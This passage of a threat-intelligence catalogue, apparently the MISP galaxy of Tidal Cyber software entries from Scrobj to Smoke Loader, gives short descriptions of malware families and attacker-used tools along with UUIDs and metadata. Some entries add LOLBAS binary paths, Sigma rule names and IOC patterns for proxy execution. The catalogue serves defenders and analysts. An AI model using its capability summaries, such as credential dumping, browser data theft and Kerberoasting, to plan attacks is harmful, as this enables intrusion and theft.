which can be used as unique global reference for Scrobj
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5194 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
SDBbot
SDBbot is a backdoor with installer and loader components that has been used by TA505 since at least 2019.[Proofpoint TA505 October 2019][IBM TA505 April 2020]
Internal MISP references
UUID 046bbd0c-bff5-46fc-9028-cbe46a9f8ec5
which can be used as unique global reference for SDBbot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0461 |
source | MITRE |
tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SDelete
SDelete is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. [Microsoft SDelete July 2016]
Internal MISP references
UUID 3d4be65d-231b-44bb-8d12-5038a3d48bae
which can be used as unique global reference for SDelete
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0195 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
SeaDuke
SeaDuke is malware that was used by APT29 from 2014 to 2015. It was used primarily as a secondary backdoor for victims that were already compromised with CozyCar. [F-Secure The Dukes]
Internal MISP references
UUID ae30d58e-21c5-41a4-9ebb-081dc1f26863
which can be used as unique global reference for SeaDuke
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0053 |
source | MITRE |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Seasalt
Seasalt is malware that has been linked to APT1's 2010 operations. It shares some code similarities with OceanSalt.[Mandiant APT1 Appendix][McAfee Oceansalt Oct 2018]
Internal MISP references
UUID 3527b09b-f3f6-4716-9f90-64ea7d3b9d8a
which can be used as unique global reference for Seasalt
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0345 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SEASHARPEE
SEASHARPEE is a Web shell that has been used by OilRig. [FireEye APT34 Webinar Dec 2017]
Internal MISP references
UUID 42c8504c-8a18-46d2-a145-35b0cd8ba669
which can be used as unique global reference for SEASHARPEE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0185 |
source | MITRE |
tags | ['311abf64-a9cc-4c6a-b778-32c5df5658be'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Seatbelt
Seatbelt is a tool used to perform numerous security-oriented checks.[U.S. CISA Understanding LockBit June 2023]
Internal MISP references
UUID 74beac1c-8468-4f1e-8990-11a4eb7b0110
which can be used as unique global reference for Seatbelt
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5042 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
secretsdump
According to joint Cybersecurity Advisory AA23-319A (November 2023), secretsdump is a Python script "used to extract credentials and other confidential information from a system".[U.S. CISA Rhysida Ransomware November 15 2023] Secretsdump is publicly available and included as a module of Impacket, a tool for working with network protocols.[GitHub secretsdump]
Internal MISP references
UUID a1fef846-cb22-4885-aa14-cb67ab38fce4
which can be used as unique global reference for secretsdump
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5072 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', '61b7b81d-3f98-4bed-97a9-d6c536b8969b', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '15b77e5c-2285-434d-9719-73c14beba8bd', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
ServHelper
ServHelper is a backdoor first observed in late 2018. The backdoor is written in Delphi and is typically delivered as a DLL file.[Proofpoint TA505 Jan 2019]
Internal MISP references
UUID 704ed49d-103c-4b33-b85c-73670cc1d719
which can be used as unique global reference for ServHelper
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0382 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Seth-Locker
Seth-Locker is a ransomware with some remote control capabilities that has been in use since at least 2021. [Trend Micro Ransomware February 2021]
Internal MISP references
UUID fb47c051-d22b-4a05-94a7-cf979419b60a
which can be used as unique global reference for Seth-Locker
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0639 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Setres
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Configures display settings
Author: Grzegorz Tworek
Paths:
* c:\windows\system32\setres.exe
Resources:
* https://twitter.com/0gtweet/status/1583356502340870144
Detection:
* Sigma: proc_creation_win_lolbin_setres.yml
* IOC: Unusual location for choice.exe file
* IOC: Process created from choice.com binary
* IOC: Existence of choice.cmd file [Setres.exe - LOLBAS Project]
Internal MISP references
UUID ad872ead-f3be-49df-b2f3-2526246acdf5
which can be used as unique global reference for Setres
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5162 |
source | Tidal Cyber |
tags | ['d75511ab-cbff-46d3-8268-427e3cff134a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
SettingSyncHost
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Host Process for Setting Synchronization
Author: Elliot Killick
Paths:
* C:\Windows\System32\SettingSyncHost.exe
* C:\Windows\SysWOW64\SettingSyncHost.exe
Resources:
* https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/
Detection:
* Sigma: proc_creation_win_lolbin_settingsynchost.yml
* IOC: SettingSyncHost.exe should not be run on a normal workstation [SettingSyncHost.exe - LOLBAS Project]
Internal MISP references
UUID e46a42d6-ca6e-4237-ab66-b0d102a580c7
which can be used as unique global reference for SettingSyncHost
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5163 |
source | Tidal Cyber |
tags | ['8929bc83-9ed6-4579-b837-40236b59b383', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Setupapi
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Setup Application Programming Interface
Author: LOLBAS Team
Paths:
* c:\windows\system32\setupapi.dll
* c:\windows\syswow64\setupapi.dll
Resources:
* https://github.com/huntresslabs/evading-autoruns
* https://twitter.com/pabraeken/status/994742106852941825
* https://windows10dll.nirsoft.net/setupapi_dll.html
Detection:
* Sigma: proc_creation_win_rundll32_setupapi_installhinfsection.yml
* Sigma: proc_creation_win_rundll32_susp_activity.yml
* Splunk: detect_rundll32_application_control_bypass___setupapi.yml [Setupapi.dll - LOLBAS Project]
Internal MISP references
UUID e7d450ec-dd29-455f-8d26-f8a563e1e88d
which can be used as unique global reference for Setupapi
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5195 |
source | Tidal Cyber |
tags | ['da405033-3571-4f98-9810-53d9df1ac0fb', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ShadowPad
ShadowPad is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by APT41, but has since been observed to be used by various Chinese threat activity groups. [Recorded Future RedEcho Feb 2021][Securelist ShadowPad Aug 2017][Kaspersky ShadowPad Aug 2017]
Internal MISP references
UUID 5190f50d-7e54-410a-9961-79ab751ddbab
which can be used as unique global reference for ShadowPad
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0596 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Shamoon
Shamoon is wiper malware that was first used by an Iranian group known as the "Cutting Sword of Justice" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. Shamoon has also been seen leveraging RawDisk and Filerase to carry out data wiping tasks. Analysis has linked Shamoon with Kwampirs based on multiple shared artifacts and coding patterns.[Cylera Kwampirs 2022] The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.[Palo Alto Shamoon Nov 2016][Unit 42 Shamoon3 2018][Symantec Shamoon 2012][FireEye Shamoon Nov 2016]
Internal MISP references
UUID 840db1db-e262-4d6f-b6e3-2a64696a41c5
which can be used as unique global reference for Shamoon
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0140 |
source | MITRE |
tags | ['e809d252-12cc-494d-94f5-954c49eb87ce'] |
type | ['malware'] |
Shark
Shark is a backdoor malware written in C# and .NET that is an updated version of Milan; it has been used by HEXANE since at least July 2021.[ClearSky Siamesekitten August 2021][Accenture Lyceum Targets November 2021]
Internal MISP references
UUID 278da5e8-4d4c-4c45-ad72-8f078872fb4a
which can be used as unique global reference for Shark
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1019 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SharpChromium
SharpChromium is an open-source software project. According to its GitHub repository, SharpChromium is a ".NET 4.0 CLR Project to retrieve Chromium data, such as cookies, history and saved logins."[GitHub SharpChromium]
Internal MISP references
UUID 311e8944-2157-4616-8b95-d75020e21c35
which can be used as unique global reference for SharpChromium
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5075 |
source | Tidal Cyber |
tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
SharpDisco
SharpDisco is a dropper developed in C# that has been used by MoustachedBouncer since at least 2020 to load malicious plugins.[MoustachedBouncer ESET August 2023]
Internal MISP references
UUID 4ed1e83b-a208-5518-bed2-d07c1b289da2
which can be used as unique global reference for SharpDisco
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1089 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SharpHound
SharpHound is an open-source software utility incorporated into the BloodHound Active Directory (AD) reconnaissance tool.[GitHub SharpHound] Adversaries have used SharpHound for AD enumeration.[U.S. CISA Phobos February 29 2024]
Internal MISP references
UUID 0bcf0dae-315f-491f-bc65-b1772ffa31c1
which can be used as unique global reference for SharpHound
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5275 |
source | Tidal Cyber |
tags | ['c5a258ce-9045-48d9-b254-ec2bf6437bb5', 'cc4ea215-87ce-4351-9579-cf527caf5992', 'd819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'cd1b5d44-226e-4405-8985-800492cf2865', 'e1af18e3-3224-4e4c-9d0f-533768474508'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
SharpRoast
SharpRoast is an open-source tool used to carry out Kerberoasting attacks. According to its GitHub project page, the tool is a C# port of specific functionality included in the PowerView module of the PowerSploit offensive security framework.[GitHub SharpRoast]
Internal MISP references
UUID 54a5c881-c1ad-40d0-88c0-6c32b9ef95cb
which can be used as unique global reference for SharpRoast
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5060 |
source | Tidal Cyber |
tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SharpShares
SharpShares is a tool that can be used to enumerate accessible network shares in a domain. BianLian Ransomware Group actors have used the tool for discovery purposes during attacks.[U.S. CISA BianLian Ransomware May 2023]
Internal MISP references
UUID a202b37f-5c61-410b-bb14-a3e6b2b82833
which can be used as unique global reference for SharpShares
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5004 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'cd1b5d44-226e-4405-8985-800492cf2865', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
SharpStage
SharpStage is a .NET malware with backdoor capabilities.[Cybereason Molerats Dec 2020][BleepingComputer Molerats Dec 2020]
Internal MISP references
UUID 564643fd-7113-490e-9f6a-f0cc3f0e1a4c
which can be used as unique global reference for SharpStage
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0546 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SHARPSTATS
SHARPSTATS is a .NET backdoor used by MuddyWater since at least 2019.[TrendMicro POWERSTATS V3 June 2019]
Internal MISP references
UUID f655306f-f7b4-4eec-9bd6-ac75142fcb43
which can be used as unique global reference for SHARPSTATS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0450 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Shdocvw
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Shell Doc Object and Control Library.
Author: LOLBAS Team
Paths:
* c:\windows\system32\shdocvw.dll
* c:\windows\syswow64\shdocvw.dll
Resources:
* http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
* https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
* https://twitter.com/bohops/status/997690405092290561
* https://windows10dll.nirsoft.net/shdocvw_dll.html
Detection:
* Sigma: proc_creation_win_rundll32_susp_activity.yml [Shdocvw.dll - LOLBAS Project]
Internal MISP references
UUID 67323b8a-e805-4503-8a40-d47f229453a0
which can be used as unique global reference for Shdocvw
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5196 |
source | Tidal Cyber |
tags | ['2c0f0b44-9b09-49a0-8dc5-d9fdcc515825', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Shell32
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Shell Common Dll
Author: LOLBAS Team
Paths:
* c:\windows\system32\shell32.dll
* c:\windows\syswow64\shell32.dll
Resources:
* https://twitter.com/Hexacorn/status/885258886428725250
* https://twitter.com/pabraeken/status/991768766898941953
* https://twitter.com/mattifestation/status/776574940128485376
* https://twitter.com/KyleHanslovan/status/905189665120149506
* https://windows10dll.nirsoft.net/shell32_dll.html
Detection:
* Sigma: proc_creation_win_rundll32_susp_activity.yml
* Splunk: rundll32_control_rundll_hunt.yml [Shell32.dll - LOLBAS Project]
Internal MISP references
UUID edf31b62-e9db-43c8-b9ef-55afd6b0404c
which can be used as unique global reference for Shell32
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5197 |
source | Tidal Cyber |
tags | ['e0b9882e-b9bb-4c16-b3d9-9268866eded0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Shimgvw
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Photo Gallery Viewer
Author: Eral4m
Paths:
* c:\windows\system32\shimgvw.dll
* c:\windows\syswow64\shimgvw.dll
Resources:
* https://twitter.com/eral4m/status/1479080793003671557
Detection:
* IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line [Shimgvw.dll - LOLBAS Project]
Internal MISP references
UUID 691b3a37-af46-47d2-a027-d93d901e0dac
which can be used as unique global reference for Shimgvw
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5198 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
ShimRat
ShimRat has been used by the suspected China-based adversary Mofang in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. The name "ShimRat" comes from the malware's extensive use of Windows Application Shimming to maintain persistence. [FOX-IT May 2016 Mofang]
Internal MISP references
UUID a3287231-351f-472f-96cc-24db2e3829c7
which can be used as unique global reference for ShimRat
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0444 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
ShimRatReporter
ShimRatReporter is a tool used by suspected Chinese adversary Mofang to automatically conduct initial discovery. The details from this discovery are used to customize follow-on payloads (such as ShimRat) as well as set up faux infrastructure which mimics the adversary's targets. ShimRatReporter has been used in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development.[FOX-IT May 2016 Mofang]
Internal MISP references
UUID 77d9c948-93e3-4e12-9764-4da7570d9275
which can be used as unique global reference for ShimRatReporter
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0445 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
SHIPSHAPE
SHIPSHAPE is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps. [FireEye APT30]
Internal MISP references
UUID 3db0b464-ec5d-4cdd-86c2-62eac9c8acd6
which can be used as unique global reference for SHIPSHAPE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0028 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SHOTPUT
SHOTPUT is a custom backdoor used by APT3. [FireEye Clandestine Wolf]
Internal MISP references
UUID 49351818-579e-4298-9137-03b3dc699e22
which can be used as unique global reference for SHOTPUT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0063 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SHUTTERSPEED
SHUTTERSPEED is a backdoor used by APT37. [FireEye APT37 Feb 2018]
Internal MISP references
UUID 5b2d82a6-ed96-485d-bca9-2320590de890
which can be used as unique global reference for SHUTTERSPEED
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0217 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Sibot
Sibot is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three Sibot variants in early 2021 during its investigation of APT29 and the SolarWinds Compromise.[MSTIC NOBELIUM Mar 2021]
Internal MISP references
UUID ea0a1282-f2bf-4ae0-a19c-d7e379c2309b
which can be used as unique global reference for Sibot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0589 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SideTwist
SideTwist is a C-based backdoor that has been used by OilRig since at least 2021.[Check Point APT34 April 2021]
Internal MISP references
UUID 61227a76-d315-4339-803a-e024f96e089e
which can be used as unique global reference for SideTwist
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0610 |
source | MITRE |
tags | ['8bf128ad-288b-41bc-904f-093f4fdde745'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SILENTTRINITY
SILENTTRINITY is an open-source remote administration and post-exploitation framework primarily written in Python that includes stagers written in PowerShell, C, and Boo. SILENTTRINITY was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.[GitHub SILENTTRINITY March 2022][Security Affairs SILENTTRINITY July 2019]
Internal MISP references
UUID 4765999f-c35e-4a9f-8284-9f10a17e6c34
which can be used as unique global reference for SILENTTRINITY
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0692 |
source | MITRE |
type | ['tool'] |
Siloscape
Siloscape is malware that targets Kubernetes clusters through Windows containers. Siloscape was first observed in March 2021.[Unit 42 Siloscape Jun 2021]
Internal MISP references
UUID 8ea75674-cc08-40cf-824c-40eb5cd6097e
which can be used as unique global reference for Siloscape
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Containers', 'Windows'] |
software_attack_id | S0623 |
source | MITRE |
tags | ['4fa6f8e1-b0d5-4169-8038-33e355c08bde'] |
type | ['malware'] |
Skeleton Key
Skeleton Key is malware used to inject false credentials into domain controllers with the intent of creating a backdoor password. [Dell Skeleton] Functionality similar to Skeleton Key is included as a module in Mimikatz.
Internal MISP references
UUID 206453a4-a298-4cab-9fdf-f136a4e0c761
which can be used as unique global reference for Skeleton Key
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0007 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Skidmap
Skidmap is a kernel-mode rootkit used for cryptocurrency mining.[Trend Micro Skidmap]
Internal MISP references
UUID cc91d3d4-bbf5-4a9c-b43a-2ba034db4858
which can be used as unique global reference for Skidmap
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux'] |
software_attack_id | S0468 |
source | MITRE |
type | ['malware'] |
SLIGHTPULSE
SLIGHTPULSE is a web shell that was used by APT5 as early as 2020 including against Pulse Secure VPNs at US Defense Industrial Base (DIB) entities.[Mandiant Pulse Secure Zero-Day April 2021]
Internal MISP references
UUID c8fed4fc-5721-5db2-b107-b2a9b677244e
which can be used as unique global reference for SLIGHTPULSE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network', 'Linux'] |
software_attack_id | S1110 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Sliver
Sliver is an open source, cross-platform, red team command and control framework written in Golang.[Bishop Fox Sliver Framework August 2019]
Internal MISP references
UUID bbd16b7b-7e35-4a11-86ff-9b19e17bdab3
which can be used as unique global reference for Sliver
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0633 |
source | MITRE |
tags | ['e81ba503-60b0-4b64-8f20-ef93e7783796'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
SLOTHFULMEDIA
SLOTHFULMEDIA is a remote access Trojan written in C++ that has been used by an unidentified "sophisticated cyber actor" since at least January 2017.[CISA MAR SLOTHFULMEDIA October 2020][Costin Raiu IAmTheKing October 2020] It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.[USCYBERCOM SLOTHFULMEDIA October 2020][Kaspersky IAmTheKing October 2020]
In October 2020, Kaspersky Labs assessed SLOTHFULMEDIA is part of an activity cluster it refers to as "IAmTheKing".[Kaspersky IAmTheKing October 2020] ESET also noted code similarity between SLOTHFULMEDIA and droppers used by a group it refers to as "PowerPool".[ESET PowerPool Code October 2020]
Internal MISP references
UUID 563c6534-497e-4d65-828c-420d5bb2041a
which can be used as unique global reference for SLOTHFULMEDIA
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0533 |
source | MITRE |
type | ['malware'] |
SLOWDRIFT
SLOWDRIFT is a backdoor used by APT37 against academic and strategic victims in South Korea. [FireEye APT37 Feb 2018]
Internal MISP references
UUID 7c047a54-93cf-4dfc-ab20-d905791aebb2
which can be used as unique global reference for SLOWDRIFT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0218 |
source | MITRE |
type | ['malware'] |
SLOWPULSE
SLOWPULSE is malware that was used by APT5 as early as 2020, including against U.S. Defense Industrial Base (DIB) companies. SLOWPULSE has several variants and can modify legitimate Pulse Secure VPN files in order to log credentials and bypass single- and two-factor authentication flows.[Mandiant Pulse Secure Zero-Day April 2021]
Internal MISP references
UUID 37e264a6-5ad3-5a79-bf2c-db725622206e
which can be used as unique global reference for SLOWPULSE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1104 |
source | MITRE |
type | ['malware'] |
Small Sieve
Small Sieve is a Telegram Bot API-based Python backdoor that has been distributed using a Nullsoft Scriptable Install System (NSIS) Installer; it has been used by MuddyWater since at least January 2022.[DHS CISA AA22-055A MuddyWater February 2022][NCSC GCHQ Small Sieve Jan 2022]
Security researchers have also noted Small Sieve's use by UNC3313, which may be associated with MuddyWater.[Mandiant UNC3313 Feb 2022]
Internal MISP references
UUID c58028b9-2e79-4bc9-9b04-d24ea4dd4948
which can be used as unique global reference for Small Sieve
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1035 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
SMOKEDHAM
SMOKEDHAM is a PowerShell-based .NET backdoor that was first reported in May 2021; it has been used by at least one ransomware-as-a-service affiliate.[FireEye Shining A Light on DARKSIDE May 2021][FireEye SMOKEDHAM June 2021]
Internal MISP references
UUID 9ae4154d-ee48-4aeb-b76f-6e40dbe18ff3
which can be used as unique global reference for SMOKEDHAM
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0649 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
Smoke Loader
Smoke Loader is a malicious bot application that can be used to load other malware. Smoke Loader has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. [Malwarebytes SmokeLoader 2016] [Microsoft Dofoil 2018]
Internal MISP references
UUID 2244253f-a4ad-4ea9-a4bf-fa2f4d895853
which can be used as unique global reference for Smoke Loader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0226 |
source | MITRE |
